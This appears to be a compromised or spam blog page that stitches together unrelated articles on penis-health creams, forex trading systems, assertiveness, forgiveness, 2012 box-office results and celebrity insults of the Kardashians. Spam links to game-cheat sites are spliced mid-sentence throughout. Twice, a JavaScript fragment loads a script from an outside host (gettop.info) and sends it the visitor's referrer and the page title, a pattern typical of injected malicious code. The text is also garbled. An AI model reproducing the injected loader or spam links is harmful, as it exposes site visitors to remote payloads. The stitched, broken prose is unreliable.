On the other hand, topical formulas are applied directly to the targeted tissue, where they are quickly absorbed; because of this, they can be a better choice for penis health.

Myth 2: “Foods Provide All of the Nutrients a Penis Needs.”
Just as vitamins have a long way to go before they reach the penile tissue ?if they ever do ?nutrients consumed through foods also have to make a long journey, and they are not guaranteed to provide direct benefits to the manhood. Forex Trading Systems Thinking Of Buying One Then Look For This

Forex Trading Systems ?Thinking Of Buying One? Then Look For This

I read a lot of material on forex trading systems and the great copy offering me huge profits for $100 or so, sounds great!

Then when I come to buy the system I look for one thing and one thing only to see if it&25263; worth me parting with my money.

Its obvious but most forex system click this website buyers don&25264; think to ask the obvious its:

The real time audited track record from the vendor.

After all if they make claims about how great their system is shouldn&25264; they be trading it and shouldn&25264; they have some proof it makes money?

Of course they should!

In most cases however with forex trading systems all you get is a hypothetical track record at best, or a visit our website load of vague claims without substantiation.

A hypothetical track record means absolutely nothing.

Let&25263; define exactly what this means:

It means the person had all the closing data in hindsight and can simply make the profit and loss whatever they want it to be.

You never see one that loses money.

Let&25263; face it, if we are doing a track record knowing the closing prices anyone can make money as they know what the prices did.

My 10 year old boy can do that!

There are some good forex trading systems out there and the best way to get one that is reputable is to get a trader who puts his money where his mouth is and trades his own system.

Would you take driving lessons from someone who had not driven before?

Of course you wouldn&25264;!

Use the same rule in trading if the vendor doesn&25264; have the confidence to trade his own system why should you?

Don&25264; fall for the hype

Fact is, there are many forex trading systems sold by vendors without track records and they know their systems don&25264; work and that&25263; why they don&25264; trade.

Of course, they make money from greedy and foolish people who fall for the copy.

Vendor wins www.8ballpoolhackcheat.com/ you lose ?Simple.

People will say the fact that a froex trading here system just because it has made money in the past does not mean it will make money in the future and of course this is true, but I Like the fact the person selling at least has shown profit and has the confidence to trade.

My view is never trade a system without a real time track record of at least two years.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Four Keys To Effective Assertion

Four Keys To Effective Assertion

DO YOU HAVE an “assertion hero/ine” – i.e. someone you regard as exceptionally adept at asserting her or his needs, feelings, opinions, and boundaries? Would others name *you* as a world-class asserter?
The American Management Association once defined “assertion” as communicating in a way that others can hear (understand and accept, vs. agree with) you. How does that compare with your definition?
Popular alternatives to assertion are aggression (“I put my needs and worth above yours”) and submission (“I rank my needs and dignity below yours”).
Effective assertion click this website is a vital key to mutually http://www.shadowfight2hackcheat.com/shadowfight2hack/ satisfying relationships and group harmony – yet few people study this essential skill. Even those that DO study it often miss four powerful keys to effectiveness. Can you name them?
FOUR ESSENTIAL KEYS
A “need” is one or more psychological, spiritual, and/or physical discomforts, so we’re all “needy” much of the time. A primary reason all living things (like you) communicate is to fill local needs – reduce our fluctuating discomforts.
One key to effective assertion is your ability to *identify* what you need accurately, via personal awareness. This includes using the learned ability to “dig down” below surface needs (“I need you to stop interrupting me.”) to the primazry needs causing them (“I REALLY need to feel you want to respect me.”)
Another key is evolving and living by a personal Bill of Rights -and according all other adults and kids the same rights. For an example, see
Believing you are a person of equal dignity and worth to any other person – regardless of social role, education, gender, ethnicity, or age -is essential for effective communication and satisfying relationships. That’s why “shame-based” (wounded) survivors of low-nurturance childhoods are often aggressive, submissive, or numb.
The third key is having an “assertion strategy” – i.e. specific steps you follow to assert yourself in various situations. You’ve probably developed a strategy that is so familiar as to be automatic (unconscious). Observe it!
The effectiveness of your strategy can be gauged by how often you (a) get your current primary needs met, (b) in a way that leaves you and others feeling “good enough” about yourselves, each other, and the process between you.
The fourth key is often overlooked in self-help suggestions on
“successful assertion.” It is to calmly EXPECT the other person to “resist” (disagree, deflect, ignore, ridicule, criticize, minimize, etc.) your assertion. Do this with empathy, rather than with resentment or combativeness. Can you do this?
Be prepared to acknowledge each “resistance” with a brief, nonjudgmental, respectful, “empathic listening” statement – also called mirroring, and active or reflective listening.
Then calmly and firmly re-assert with stable eye contact, and be ready for the next resistance. Do this as often as necessary, until (a) you run out of time or patience, (b) the other person finally hears (vs. agrees with) you, or (c) you both shift into win-win problem solving.
An unseen fifth key is keeping your true Self steadily in charge of your personality – but that’s the subject of another article.
Can you imagine trying this assertiveness strategy with key www.8ballpoolhackcheat.com/ adults and kids in your life? If not – why not?
It can be said that awareness, assertion, and empathic listening are required for effective social problem-solving – i.e. filling your and your partner’s primary needs well enough, and feeling good about doing so. Do you agree?
How does this assertion strategy compare with your current habit? Are you willing to try these keys? Could you become someone’s “assertion hero/ine”? Are here the young people in your life learning to assert effectively?

Forgiving How To Do It Gracefully

Forgiving- How To Do It Gracefully

One of the most difficult things we humans have to encounter is to respond to evil with kindness, hatred with love, or compassion with cruelty- forgiving the unforgivable. We can’t help but admire people who are capable of these exalted acts, but when that very thing is required of us personally, it seems inconceivable. Our default reaction seems to be anger, abhorrence, revenge, righteousness, depression, etc. It’s human of course, to feel these default reactions- it’s not easy when you have been cheated by your click this website spouse, slighted by http://www.shadowfight2hackcheat.com/shadowfight2hack/ your mother-in-law, betrayed by a best friend, or bad-mouthed by a co-worker.
But have you ever asked yourself, “Until when am I going to carry thing pain?” Do you know that it takes more energy to hate than to forgive and let go? How to forgive someone who caused you so much pain may be the hardest thing to do, but believe me, no one will benefit from it more than you. Don’t even think that forgiving is condoning or tolerating an appalling act, rather, view it as big favor to more details yourself. It’s time to unburden yourself with resentment and vengeance. Let the Universe take care of those people who have wronged you, the Universe has a way of correcting them. Have faith- for people always get what they deserve.
The best thing that you should do is to heal and take care of yourself, and you should start by forgiving. If you don’t know how to start, here’s how:
1. The more you hate- the more you lose. Keep in mind that while you are burdened by hatred, the other person is out dancing. This means that no amount of your anger rituals can harm the person you abhor the slightest.
2. List down the things you have learned from the bad experience. If you have been cheated by your partner, go to the core of the problem. Find out the “what and why’s” and learn from it. Keep in mind that nothing is futile as long as you have learned from it. If the bad experience helped you become a better and wiser person, then it’s time to consider forgiving.
3. If forgiving is truly difficult- think of your blessings. Take a moment to think and appreciate the good things in your life. From the food on your table, to your health, to your job, to the people who cares for you- be truly grateful for it. Chances are when you realize how fortunate you are; you will hardly have time to carry anymore grudges.
4. Don’t talk about it. Repeating the “unfortunate event” over and over can be draining not only to you, but to people who are listening to you. Its okay to talk about it initially, but don’t make it a habit. Remember, the word forgive literally means, love here “untie” so stop associating yourself with the bad situation by talking about it repeatedly.
5. The most important key in forgiving is to forgive yourself first. Forgiving includes forgiving yourself for making bad choices, for being too trusting, or for whatever you think that contributed to the whole negative situation. Once you have acknowledged this, be compassionate with yourself. Give yourself time to grieve and feel the pain of the experience. Have a healthy form of release. Don’t bottle it up. Take care of your health. Make yourself the priority.
Heed this, forgiving is for you, not for the other person. It is intended to free you from any thing that can harm your mind and spirit. If you feel that you are not ready, it’s fine. People heal in their own time. But before anything else, allow me to share you this thought from Lewis B. Smedes, “To forgive is to set a prisoner free and discover that the prisoner was you.”s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

’21 Jump Street’ Tops the Weekend!

Sony posts its third number one debut of 2012 (after “Underworld: Awakening” and “The Vow”) this weekend with the R-rated action comedy “21 Jump Street” and its bigger than expected $35 million Friday through Sunday total. This was the biggest opening weekend for a non-summer, non-sequel R-rated comedy. Starring Oscar-nominee Jonah Hill and heartthrob and “The Vow” star Channing Tatum, the film gets its title from the late-80’s TV show that starred Johnny Depp but is re-imagined as a comedy about young cops sent undercover in a high school to bust a drug ring.
“Dr. Seuss’ The Lorax,” continues its incredible run and enters its third weekend adding another $22.8 million to its environmentally-friendly bank account. The Universal Pictures release continues to be the top choice for families and in the wake of another string of impressive mid-week grosses and winds up with about $158.4 million in domestic revenue by Sunday night.

Disney’s mega-budget action adventure “John Carter” met some resistance in a tough domestic marketplace taking in just $30.2 million last weekend, but luckily grabbed an impressive $70.6 million in international revenues to make up the difference. The film earned $13.5 million in North America this weekend bringing its 10-day total to $53.2 million and its worldwide total to $179.3 million.

Warner Bros.’ R-rated comedy “Project X” from producer Todd Phillips in its third weekend added another $4 million to its party fund. The modestly-budgeted (a reported $12 million) story of high school kids trying to build their reputations as the ultimate party hosts profitably nears the $50 million mark this weekend.

Eddie Murphy in Paramount’s “A Thousand Words” held up pretty well this weekend dropping just 39% in its second weekend and taking the fifth spot with $3.75 million and a 10-day total of $12.1 million.

Just outside of the top five, Relativity Media’s “Act of Valor” blasted its way to around $3.7 million and crosses the $60 million in its fourth weekend of release.. The R-rated action drama featuring real Navy SEALs has had a strong run in theaters since its debut about a month ago.

The first “down” weekend of the year as we await the box office frenzy that will accompany Lionsgate’s “The Hunger Games” later this week. Trust us when we say box office will be way up next weekend!

Original ‘Teen Mom’ Ending After Next Season

MTV has announced that the upcoming fourth season of Teen Mom will be the show’s last, so from now on the personal and parenting woes of Maci Bookout, Amber Portwood, Farrah Abraham and Catelynn Lowell won’t be televised. However, we may get the occasional update. MTV tells Us Weekly, “They will continue to be a part of our MTV family, and we’re thankful to these brave young women for sharing their stories and helping to make a positive impact on teen pregnancy prevention.”

No reason was given for the show’s cancellation, but we suspect it may have something to do with the fact that 20-Something Mom isn’t that catchy. The ladies were first featured on MTV’s 16 and Pregnant in 2009, and went on to star in the spinoff. MTV is still producing new seasons of Teen Mom 2, and the network announced last month that it will soon launch Teen Mom 3 starring girls culled from the upcoming season of 16 Pregnant.

The premiere date for the show’s final season hasn’t been announced, but it’s expected to air this summer. In the meantime, America will have no shortage of young pregnant ladies to sympathize with (and occasionally judge). 16 and Pregnant will be back on Tuesday, March 27, so tune in to get your first look at the future stars of Teen Mom 3.

‘Lorax’ Tops ‘John Carter With $39.1 Million!

Universal’s “Dr. Seuss’ The Lorax,” absolutely shattered expectations last weekend with the biggest opening of the year thus far with $70.2 million. The animated family film has been a mid-week favorite as well impressively earning around $3 million per day. The first quarter hit tops the chart for the second weekend in a row with $39.1 million and a 10 day total through Sunday of $121.950 million.

Disney’s mega-budget action adventure “John Carter” had much to prove this weekend as it hit 3,749 theaters as well as 3-D and IMAX showings. The film based on Edgar Rice Burroughs’ “A Princess of Mars,” has a long road ahead to recoup its reported $250 million budget and as such has been subject to intense media scrutiny. A $30.6 million North American debut was bolstered by an international opening of $70.6 million for a solid worldwide debut of $101.2 million. IMAX once again more than pulls their weight with $5.0 million (or 17%) of the weekend gross in 289 theaters.

Warner Bros.’ R-rated comedy “Project X” from producer Todd Phillips partied its way to a better-than-expected $21 million last weekend and keeps the festivities in full swing in its sophomore weekend. $11.550 million lands the film in third place and with $40.1 million in North America by Sunday night.

The R-rated horror was be brief yet effective in the 88 minutes of “Silent House” from Open Road Films. Captured in real time and “inspired by true events,” this story of a young woman trapped inside her family’s lakeside retreat earned $7.010 million in its debut weekend.

Rounding out the top 5, Relativity Media’s “Act of Valor” continues to be a solid performer as it enjoys its third weekend of release. The R-rated action drama that features live ammo and real Navy SEALs added another $7 million to its war budget will have a total of $56.1 million in North American dollars by Sunday night.

Opening in 1,890 theaters, Paramount’s “A Thousand Words” starring Eddie Murphy narrowly missed a spot in the Top 5 with a gross of $6.35 million.

The box office continues to go up up up as year-to-date revenues are running 18.28% ahead of last year at this point with every weekend beating the comparable frame a year ago since January 6.

Jon Hamm Calls Kim Kardashian ‘Idiot': Hollywood’s Favorite Punching Bag?

Considering how awful celebrities’ behavior can be, it’s a bit shocking that the Kardashians have become the family Hollywood loves to hate. They haven’t committed any felonies (as far as we know), and in fact, their biggest crimes include Khloe’s DUI and rampant overuse of the letter “K.” Yet, the insults keep on coming.

The latest is from Mad Men star Jon Hamm. In an interview with Elle UK, he said, “Whether it’s Paris Hilton or Kim Kardashian or whoever, stupidity is certainly celebrated. Being a f**king idiot is a valuable commodity in this culture because you’re rewarded significantly.” Hamm added, “Incuriousness has become cool… It’s celebrated. It doesn’t make sense to me.” One might argue that it takes a certain amount of intelligence to make everyone in your family a celebrity when you aren’t particularly good at acting, singing, or dancing, however, Hamm isn’t alone. Here’s a look back at some of the nastiest burns directed toward Kim and company:

Jonah Hill
When talking to The Huffington Post in December, Jonah Hill lamented the fact that the Kardashians are more popular than Mad Men — though he also admitted that he enjoys watching reality TV. He said, “The truth of it is, I have friends who work in TV and the Kardashians get higher ratings than their TV shows. Shows that people actually work hard on; writing, and creating, and trying to tell stories. The fact that the Kardashians could be more popular than a show like Mad Men is disgusting.” Can’t highbrow dramas coexist with lighter fare? We didn’t hear Khloe complaining about Jonah following up Moneyball with the comedy 21 Jump Street.

Sacha Baron Cohen
At least Jonah Hill was trying to make a point about the state of our culture. Sacha Baron Cohen’s Kardashians’ dig is just pointless and mean. In the trailer for his upcoming film The Dictator we see his character trying to give Megan Fox a ruby in return for sexual favors. She says, “Is this a joke? Am I a Kardashian?” to which he replies, “Of course not. You’re much less hairy.”

Michael Buble
Sacha Baron Cohen is know for his lewd humor, but even notorious nice guy Michael Buble took a random shot at Kim. At a concert in the fall he announced, “Please welcome Kim Kardashian,” then added, “Nah, just f**ing with you! That b**ch isn’t coming on my stage.”

Snoop Dogg
Snoop Dogg used the same expletive in a web video released in January, in which he tells Kris Humphries he shouldn’t have tried to “wife the b**ch.” Though we’re fairly certain Snoop isn’t a licensed marital counselor, and it’s unclear if he’s even met Kim, he offered this bit of advice: “She’s not that type of a h–, she gets around … She’s cold-blooded, I’m pretty sure she’ll have a book in a month talking about all the n—-s that she got and how she played them.”

Cher
Kim’s short-lived marriage seems to have riled up quite a few celebrities. In the fall Cher when on an anti-Kardashian Twitter rant and it had nothing to do with Robert Kardashian competing against her son Chaz Bono on Dancing With the Stars at the time. Her Tweets, “Never saw a Kardashian but these B–ches should b Drop kicked down a freeway! Not kidding!” and “feel like I live in a cave! Once watched J&Kate they were sweet! This s–t is HARD CORE! Is true Kardashian did Porno ! I’m so Fkn outa it !” led many to conclude that Cher’s meltdown was instigated by the Kardashians’ wedding special. Later Cher claimed she was talking about Bridezillas, but that doesn’t really explain the reference to Kim’s sex tape.

Mariah Carey
While discussing her marriage to Nick Cannon in November, Mariah Carey said, “I’m a real person, I’m not going to put on a fake face for Hollywood. Sometimes we make each other mad, that’s why we aren’t divorced after four months.” Yes, attacking the Kardashians became so popular after Kim’s divorce that Mimi was able to insult her without even saying her name.
